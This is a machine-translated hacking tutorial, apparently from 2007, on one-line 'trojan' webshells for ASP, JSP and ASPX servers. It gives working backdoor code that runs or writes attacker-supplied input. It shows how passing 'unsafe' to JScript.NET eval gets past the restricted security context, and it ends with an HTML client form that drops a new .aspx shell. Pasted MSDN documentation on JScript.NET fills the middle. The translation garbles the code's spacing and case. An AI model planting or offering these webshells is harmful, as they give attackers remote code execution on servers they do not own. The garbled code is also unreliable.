Aspx one-sentence Trojan-simplified version & detailed analysis (Asp-execute vs aspx-

First, let's review the typical Trojan horse in the previous ASP sentence!

<% If request ("nonamed") <> "" then execute request ("nonamed") %>

In vbs, execute is used to dynamically run the specified code, and the eval function can also be used in JScript. That is to say, there is also a version of ASP trojan that uses the eval of JScript! I won't say much about examples on the Internet !.....

After all, the parsing language becomes intermediate code, such as Java. net, and dynamic execution does not exist!

Previously, ASP normally only supports vbs JScript (I won't talk about exceptions like python perlscript )...

Now, the advanced vbs version supported by aspx does not have the exclusive method of execute... sorry ....

At the same time, JScript is also switched to the advanced version of jscript.net, but the eval function we need survive! Script child is lucky...

Bury a foreshadowing first ~ Let's talk about a sentence in today's intermediate language web applications.

JSP: <%
If (request. getparameter ("F ")! = NULL) (new Java. io. fileoutputstream (application. getrealpath ("\") + request. getparameter ("F "))). write (request. getparameter ("T "). getbytes ());
%> This is what I wrote myself. It's all yours! I will not speak .....

Aspx: <% @ page Language = "C #" validaterequest = "false" %> <% system. io. streamwriter ow = new system. io. streamwriter (server. mappath ("images. aspx "), false); ow. write (request. params ["L"]); ow. close () %> I don't know who it is. It feels like my JSP! But the simple shell is implemented! Ing ....

The two statements are basically the same. The call class writes all received messages to the file! In short, it is just a write operation on the file !~ The glory of ASP in the past is now getting rid of the limitations in the backdoor of the intermediate language ~~ Error !...... We can also implement aspx C/S Trojans! Because jscript.net exists! The eval function mentioned above still exists !~
OK. Let's implement it first.
<% @ Page Language = "jscript" %> <% response. Write (eval (request. item ["nonamed"]); %>
So? Well! You can try it ~ Save as text. aspx and submit
Http: // 127.0.0.1/text. aspx? Nonamed = var % 20 mydate % 20 = % 20new % 20 Date ();
Print the current time .. Sat Aug 4 20:05:20 UTC + 8 2007
Looks like OK! Let's try again.
Http: // 127.0.0.1/text. aspx? Nonamed = server. mappath (".");
Report error found !.... (I spent a few months here because I got stuck here. Otherwise, this article will be published early! Thank you for choosing QQ: 4659675. You are welcome to learn from him... ha)
Error cause
{
Security Exception
Note: An application attempts to perform operations that are not permitted by a security policy. To grant the required permissions to the application, contact the system administrator or change the trust level of the application in the configuration file.
Exception details: system. Security. securityexception: The request fails.
}
Why? OK. Find the MS documentation.

See below

Http://msdn.microsoft.com/library/chs/default.asp? Url =/library/CHS/jscript7/html/jsmscstartpage. asp

JScript. net

New Features of JScript. net
JScript. NET is the next-generation Microsoft JScript Language. It is a convenient and quick way to access the Microsoft. NET platform using web languages. JScript is mainly used to construct web sites using ASP. NET and customize applications using. NET Framework scripts.

JScript. net is compatible with the ecmascript standard, and it also has other features not specified by ecmascript, such as true compilation of code, by complying with the "general language specification" (CLS) cross-language support and.. NET Framework. Visual Studio.. NET 2002 JScript. net version makes full use.. NET Framework itself has the security, while JScript. NET 2003 adds a restricted security context for the eval method to further enhance security.

The purpose of several new features in JScript. NET is to make full use of CLS, which is a set of rules used to standardize data types, object exposure methods, and object interuse methods. Any CLS-compliant language can use the classes, objects, and components created in JScript. net. As a JScript developer, you can use other CLS-compliant programming languages, widgets, and objects without considering specific language differences (such as data types ). Some CLS functions used by jscript. Net include namespaces, attributes, reference parameters, and local arrays.

The following are some new features in JScript. Net:

New Features of JScript. NET 2003
Restricted security context of the eval Method
Now, to enhance security, no matter what the caller's permissions are, the built-in eval method runs scripts in the restricted security context by default. When Eval is called, if "unsafe" is used as the second optional parameter, the script runs with the caller's permission, which allows access to the file system, network, or user interface. For more information, see the eval method.
New Features of JScript. NET 2002
Class-based object
JScript. Net (like JScript) supports inheritance through prototype-based objects. JScript. Net also allows you to declare classes that define object data and behavior to support class-based objects. Classes created in JScript. Net can be used and extended by any. NET language. Class can inherit the attributes and methods of the base class. You can apply several attributes to classes and Class Members to modify their behavior and visibility. For more information, see class-based objects.
JScript Data Type
In JScript. Net (like JScript), you can write a program without specifying the Data Type of the variable. JScript. Net can also be used as a strongly typed language, where all variables are bound to a specific data type, or you can mix typed and untyped variables. JScript. NET provides many new data types. You can also use classes and. Net types as data types. For more information, see JScript data types.
Conditional compilation
Commands can control the compilation of JScript. net programs. For example, the @ DEBUG command can enable or disable the release of debugging information for a specific part of the script. For more information, see the @ DEBUG command. The @ position command sets the line number of the current line for the debugger. For more information, see the @ position command. If you are writing code that will be merged into other scripts, these two commands are useful. For more information, see Conditional compilation.
JScript namespace
Namespace organizes classes, interfaces, and methods into hierarchies to prevent name conflicts. In JScript. net, you can define your own namespace. You can also use JScript. Net to access any. NET Framework namespaces, including those defined by yourself. The package statement allows you to package related classes for convenient deployment and avoid name conflicts. For more information, see package statements. The Import Statement allows the. NET Framework namespace to be used for a script, so that the script can access the classes and interfaces in The namespace. For more information, see import statements.
JScript variables and constants
JScript. NET introduces a const statement to define the identifier that represents a constant value. For more information, see JScript variables and constants.
Enumeration
JScript. NET introduces an Enum statement that allows you to construct enumeration data types. You can use enumeration to specify a useful name for your data type value. For more information, see the enum statement.
Find the eval method.

Http://msdn.microsoft.com/library/chs/default.asp? Url =/library/CHS/jscript7/html/jsmtheval. asp

JScript. net

Eval Method
Calculate and execute the JScript code.

Function eval (codestring: String [, override: String])
Parameters
Codestring
Required. A string that contains valid JScript code.
Override
Optional. Determines the string to be applied to the security permissions of the Code in codestring.
Remarks
The eval function allows dynamic JScript source code execution.

The context of the Code passed to the eval method is the same as that of the eval method. Note that the new variables or types defined in the eval statement are invisible to the closed program.

Unless the string "unsafe" is passed as the second parameter, the Code passed to the eval method is executed in the restricted security context. Restricted security context prohibit access to system resources, such as file systems, networks, or user interfaces. If the code tries to access these resources, a security exception occurs.

When the second parameter of Eval is the string "unsafe", the Code passed to the eval method is executed in the security context of the called code. The second parameter is case sensitive. Therefore, the string "unsafe" or "unsafe" does not overwrite the restricted security context.

Security description in insecure mode, Eval can only be used to execute code strings obtained from trusted sources.

Originally, Eval restricted security ~ Well, let's add the unsafe parameter implementation as he said.
<% @ Page Language = "jscript" %> <% response. Write (eval (request. item ["Z"], "unsafe"); %>
OK
Submit http: // 127.0.0.1/test. aspx? Z = server. mappath (".")
Print out f: \ nonamed \ dotnetproject. It is my current web directory! Tears ing ~~~ That is, when you submit something, it will run something to restore the ASP backdoor effect !~ -_-
Response. Write can be avoided! But I added it for ECHO :)
OK. Let's construct a client with one sentence!

<! Doctype HTML public "-// W3C // dtd html 4.0 transitional // en">
<HTML>
<Head>
<Title> aspx one line code client </title>
</Head>
<Body>
<Form action = http: // 127.0.0.1/test. aspx method = post>
<Textarea name = z Cols = 120 rows = 10 width = 45>
VaR nonamed = new system. Io. streamwriter (server. mappath ("nonamed. aspx"), false );
Nonamed. Write (request. item ["L"]);
Nonamed. Close ();
</Textarea>
<Textarea name = L Cols = 120 rows = 10 width = 45> your code </textarea> <br> <center> <br>
<Input type = submit value = submit>
</Body>
</Html>

The full text .....